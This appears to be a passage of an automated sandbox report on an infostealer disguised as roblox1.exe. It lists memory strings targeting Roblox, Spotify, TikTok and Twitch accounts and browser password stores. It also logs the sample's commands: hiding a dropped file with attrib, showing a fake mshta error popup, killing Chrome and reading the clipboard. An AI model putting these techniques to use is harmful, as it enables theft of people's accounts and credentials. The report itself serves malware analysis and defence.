                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://twitter.comarefereruhttps://twitter.com/homeusec-fetch-destaemptyusec-fetch-modeacorsusec-fe
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap
                  Source: stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/FilePreviews.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Klaviyo.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Tidelift.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/24.2.0/_static/sponsors/Variomedia.svg
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/latest/names.html)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html
                  Source: stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/changelog.html)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/comparison.html#customization)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes)
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014E9000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.ibm.com/
                  Source: stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                  Source: stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                  Source: stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1949761469.00000213BF5B4000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                  Source: stub.exe, 00000003.00000003.1698207529.00000213BEF58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014DE000.00000004.00000020.00020000.00000000.sdmp, roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1953361364.00007FFBA9F1A000.00000002.00000001.01000000.00000013.sdmp, stub.exe, 00000003.00000002.1954523023.00007FFBAA267000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://www.openssl.org/H
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945949280.00000213BE750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0205/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/dev/peps/pep-0506/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.reddit.com/user/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.reddit.com/user/acomment_karmaatotal_karmaais_modais_goldais_suspendedaprofileUrlu
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.roblox.com/my/account/json
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.roblox.com/my/account/jsonuhttps://economy.roblox.com/v1/users/aresaUserIdu/currencyuhtt
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.spotify.com/api/account-settings/v1/profileatextaloadsaprofileagenderabirthdateu
                  Source: stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://www.twitch.tv/
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: https://www.twitch.tv/adisplayNameahasPrimeaisPartneralanguageaprofileImageURLabitsBalanceatotalCoun
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.variomedia.de/
                  Source: stub.exe, 00000003.00000003.1936161103.00000213BEEF2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936493443.00000213BEEF3000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wwww.certigna.fr/autorites/
                  Source: stub.exe, 00000003.00000003.1935734211.00000213BEEE4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://wwww.certigna.fr/autorites/0m
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Code function: 3_2_00007FFBAAF173D0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 56_2_00007FFB49712CA9
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pyd 3B0661EF2264D6566368B677C732BA062AC4688EF40C22476992A0F9536B0010
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Code function: String function: 00007FFBAAF29DB0 appears 43 times
                  Source: _overlapped.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: unicodedata.pyd.0.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                  Source: Monster.exe.3.dr | Static PE information: Number of sections : 12 > 10
                  Source: roblox1.exe | Static PE information: Number of sections : 12 > 10
                  Source: stub.exe.0.dr | Static PE information: Number of sections : 12 > 10
                  Source: python3.dll.0.dr | Static PE information: No import functions for PE file found
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameunicodedata.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301C9A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamevcruntime140.dllT vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepython310.dll. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameselect.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesqlite3.dll0 vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_asyncio.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_bz2.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_ctypes.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B3014DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibcryptoH vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelibsslH vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepyexpat.pyd. vs roblox1.exe
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B30158A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamepython3.dll. vs roblox1.exe
                  Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: classification engine | Classification label: mal100.spre.phis.troj.spyw.evad.winEXE@110/57@2/3
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | File created: C:\Users\user\AppData\Local\MonsterUpdateService\
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6864:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Mutant created: \Sessions\1\BaseNamedObjects\M
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
                  Source: C:\Users\user\Desktop\roblox1.exe | File created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316
                  Source: roblox1.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
                  Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\systeminfo.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\quser.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                  Source: C:\Users\user\Desktop\roblox1.exe | File read: C:\Users\desktop.ini
                  Source: C:\Users\user\Desktop\roblox1.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Windows\System32\cmd.exe | File read: C:\Windows\System32\drivers\etc\hosts
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: stub.exe, 00000003.00000003.1690926482.00000213BEDDA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947473880.00000213BEDC3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: roblox1.exe, 00000000.00000003.1539994673.000001B301922000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                  Source: roblox1.exe | ReversingLabs: Detection: 55%
                  Source: stub.exe | String found in binary or memory: can't send non-None value to a just-started generator
                  Source: unknown | Process created: C:\Users\user\Desktop\roblox1.exe "C:\Users\user\Desktop\roblox1.exe"
                  Source: C:\Users\user\Desktop\roblox1.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\roblox1.exe | Process created: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe C:\Users\user\Desktop\roblox1.exe
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe""
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "chcp"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
